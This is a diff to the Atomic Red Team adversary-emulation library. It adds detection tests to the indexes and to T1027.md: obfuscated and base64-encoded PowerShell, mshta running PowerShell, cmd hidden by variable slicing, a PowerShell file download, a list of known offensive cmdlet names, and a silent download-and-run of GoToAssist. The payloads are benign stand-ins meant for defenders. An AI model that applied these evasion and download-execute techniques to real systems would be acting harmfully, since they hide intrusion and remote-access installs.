diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index f2257e0e..910ab46c 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -385,6 +385,7 @@ defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell +defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt @@ -401,6 +402,7 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell +defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell @@ -798,6 +800,8 @@ execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command par execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell +execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt +execution,T1059.001,PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell execution,T1059.006,Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh execution,T1059.006,Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh execution,T1059.006,Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh @@ -818,6 +822,7 @@ execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt +execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt @@ -860,6 +865,7 @@ command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca617 command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh +command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell @@ -871,6 +877,7 @@ command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used p command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell +command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index b338da52..6a11056d 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -257,6 +257,7 @@ defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell +defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt @@ -272,6 +273,7 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell +defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell @@ -528,6 +530,7 @@ command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt +command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell @@ -536,6 +539,7 @@ command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used p command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell +command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt @@ -570,6 +574,8 @@ execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command par execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell +execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt +execution,T1059.001,PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt @@ -584,6 +590,7 @@ execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt +execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 21b70104..271dc6af 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -662,6 +662,7 @@ - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows] - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows] + - Atomic Test #10: Mshta used to Execute PowerShell [windows] - [T1218.007 Msiexec](../../T1218.007/T1218.007.md) - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows] - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] @@ -685,6 +686,7 @@ - Atomic Test #4: Execution from Compressed File [windows] - Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows] - Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows] + - Atomic Test #7: Obfuscated Command in PowerShell [windows] - [T1218.008 Odbcconf](../../T1218.008/T1218.008.md) - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) @@ -1436,6 +1438,8 @@ - Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] + - Atomic Test #19: PowerShell Command Execution [windows] + - Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows] - [T1059.006 Python](../../T1059.006/T1059.006.md) - Atomic Test #1: Execute shell script via python's command mode arguement [linux] - Atomic Test #2: Execute Python via scripts (Linux) [linux] @@ -1470,6 +1474,7 @@ - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md) - Atomic Test #1: Create and Execute Batch Script [windows] - Atomic Test #2: Writes text to a file and displays it. [windows] + - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows] - [T1047 Windows Management Instrumentation](../../T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] - Atomic Test #2: WMI Reconnaissance Processes [windows] @@ -1559,6 +1564,7 @@ - Atomic Test #12: svchost writing a file to a UNC path [windows] - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] - Atomic Test #14: whois file download [linux, macos] + - Atomic Test #15: File Download via PowerShell [windows] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #1: Connection Proxy [macos, linux] - Atomic Test #2: Connection Proxy for macOS UI [macos] @@ -1585,6 +1591,7 @@ - Atomic Test #1: TeamViewer Files Detected Test on Windows [windows] - Atomic Test #2: AnyDesk Files Detected Test on Windows [windows] - Atomic Test #3: LogMeIn Files Detected Test on Windows [windows] + - Atomic Test #4: GoToAssist Files Detected Test on Windows [windows] - [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md) - Atomic Test #1: Base64 Encoded data. [macos, linux] - Atomic Test #2: XOR Encoded data. [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index d85cc21e..672d6010 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -470,6 +470,7 @@ - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows] - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows] + - Atomic Test #10: Mshta used to Execute PowerShell [windows] - [T1218.007 Msiexec](../../T1218.007/T1218.007.md) - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows] - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] @@ -489,6 +490,7 @@ - Atomic Test #4: Execution from Compressed File [windows] - Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows] - Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows] + - Atomic Test #7: Obfuscated Command in PowerShell [windows] - [T1218.008 Odbcconf](../../T1218.008/T1218.008.md) - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) @@ -960,6 +962,7 @@ - Atomic Test #11: OSTAP Worming Activity [windows] - Atomic Test #12: svchost writing a file to a UNC path [windows] - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] + - Atomic Test #15: File Download via PowerShell [windows] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #3: portproxy reg key [windows] - T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -983,6 +986,7 @@ - Atomic Test #1: TeamViewer Files Detected Test on Windows [windows] - Atomic Test #2: AnyDesk Files Detected Test on Windows [windows] - Atomic Test #3: LogMeIn Files Detected Test on Windows [windows] + - Atomic Test #4: GoToAssist Files Detected Test on Windows [windows] - [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md) - Atomic Test #2: XOR Encoded data. [windows] - T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -1038,6 +1042,8 @@ - Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] + - Atomic Test #19: PowerShell Command Execution [windows] + - Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows] - T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - Atomic Test #1: Scheduled Task Startup Script [windows] @@ -1063,6 +1069,7 @@ - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md) - Atomic Test #1: Create and Execute Batch Script [windows] - Atomic Test #2: Writes text to a file and displays it. [windows] + - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows] - [T1047 Windows Management Instrumentation](../../T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] - Atomic Test #2: WMI Reconnaissance Processes [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 4f451fdb..3bf345c7 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -28655,6 +28655,28 @@ defense-evasion: command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}' name: powershell + - name: Mshta used to Execute PowerShell + auto_generated_guid: 8707a805-2b76-4f32-b1c0-14e558205772 + description: 'Use Mshta to execute arbitrary PowerShell. Example is from the + 2021 Threat Detection Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + message: + description: Encoded message to include + type: string + default: Hello,%20MSHTA! + seconds_to_sleep: + description: How many seconds to sleep/wait + type: string + default: 5 + executor: + command: 'mshta.exe "about:''" + +' + name: command_prompt T1218.007: technique: id: attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336 @@ -29529,6 +29551,25 @@ defense-evasion: executor: command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} +' + name: powershell + - name: Obfuscated Command in PowerShell + auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f + description: 'This is an obfuscated PowerShell command which when executed prints + "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report + by Red Canary. + +' + supported_platforms: + - windows + executor: + command: '$cmDwhy =[TyPe]("{0}{1}" -f ''S'',''TrING'') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f''nv'',''cO'',''ert'') ; &("{0}{2}{3}{1}{4}" + -f''In'',''SiO'',''vOKe-EXp'',''ReS'',''n'') ( (&("{1}{2}{0}"-f''blE'',''gET-'',''vaRIA'') (''CMdw''+''h''+''y''))."v`ALUe"::("{1}{0}" + -f''iN'',''jO'').Invoke('''',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 + , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, + 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { ( + [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) + ' name: powershell T1218.008: @@ -60105,6 +60146,55 @@ execution: -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop' name: powershell + - name: PowerShell Command Execution + auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598 + description: 'Use of obfuscated PowerShell to execute an arbitrary command; + outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection + Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + obfuscated_code: + description: 'Defaults to: Invoke-Expression with a "Write-Host" line.' + type: string + default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA== + executor: + command: 'powershell.exe -e #{obfuscated_code} + +' + name: command_prompt + - name: PowerShell Invoke Known Malicious Cmdlets + auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3 + description: Powershell execution of known Malicious PowerShell Cmdlets + supported_platforms: + - windows + input_arguments: + Malicious_cmdlets: + description: Known Malicious Cmdlets + type: String + default: '"Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", + "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", + "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", + "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", + "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", + "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", + "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", + "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", + "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", + "Set-CriticalProcess", "Set-MasterBootRecord" + +' + executor: + name: powershell + elevation_required: true + command: |- + $malcmdlets = #{Malicious_cmdlets} + foreach ($cmdlets in $malcmdlets) { + "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"} + foreach ($cmdlets in $malcmdlets) { + $cmdlets} T1059.006: technique: external_references: @@ -61581,6 +61671,27 @@ execution: ' name: command_prompt + - name: Suspicious Execution via Windows Command Shell + auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 + description: 'Command line executed via suspicious invocation. Example is from + the 2021 Threat Detection Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + output_file: + description: File to output to + type: string + default: hello.txt + input_message: + description: Message to write to file + type: string + default: Hello, from CMD! + executor: + command: "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} + & type #{output_file}\n" + name: command_prompt T1047: technique: id: attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055 @@ -65221,6 +65332,27 @@ command-and-control: cleanup_command: 'rm -f #{output_file} ' + - name: File Download via PowerShell + auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + description: 'Use PowerShell to download and write an arbitrary file from the + internet. Example is from the 2021 Threat Detection Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + target_remote_file: + description: File to download + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt + output_file: + description: File to write to + type: string + default: LICENSE.txt + executor: + command: "(New-Object Net.WebClient).DownloadString('#{target_remote_file}') + | Out-File #{output_file}; Invoke-Item #{output_file}\n" + name: powershell T1090.001: technique: external_references: @@ -66242,6 +66374,23 @@ command-and-control: $file1 -ErrorAction Ignore" name: powershell elevation_required: true + - name: GoToAssist Files Detected Test on Windows + auto_generated_guid: 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 + description: 'An adversary may attempt to trick the user into downloading GoToAssist + and use to establish C2. Download of GoToAssist installer will be at the destination + location and ran when sucessfully executed. + +' + supported_platforms: + - windows + executor: + command: | + Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1" + $file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe" + Start-Process $file1 /S; + cleanup_command: try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{} + name: powershell + elevation_required: true T1132.001: technique: external_references: diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md index e40093ff..93dfbd53 100644 --- a/atomics/T1027/T1027.md +++ b/atomics/T1027/T1027.md @@ -22,6 +22,8 @@ Adversaries may also obfuscate commands executed from payloads or directly via a - [Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP](#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http) +- [Atomic Test #7 - Obfuscated Command in PowerShell](#atomic-test-7---obfuscated-command-in-powershell) +
@@ -266,4 +268,32 @@ Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} +
+
+ +## Atomic Test #7 - Obfuscated Command in PowerShell +This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 8b3f4ed6-077b-4bdd-891c-2d237f19410f + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') ( (&("{1}{2}{0}"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) +``` + + + + + +
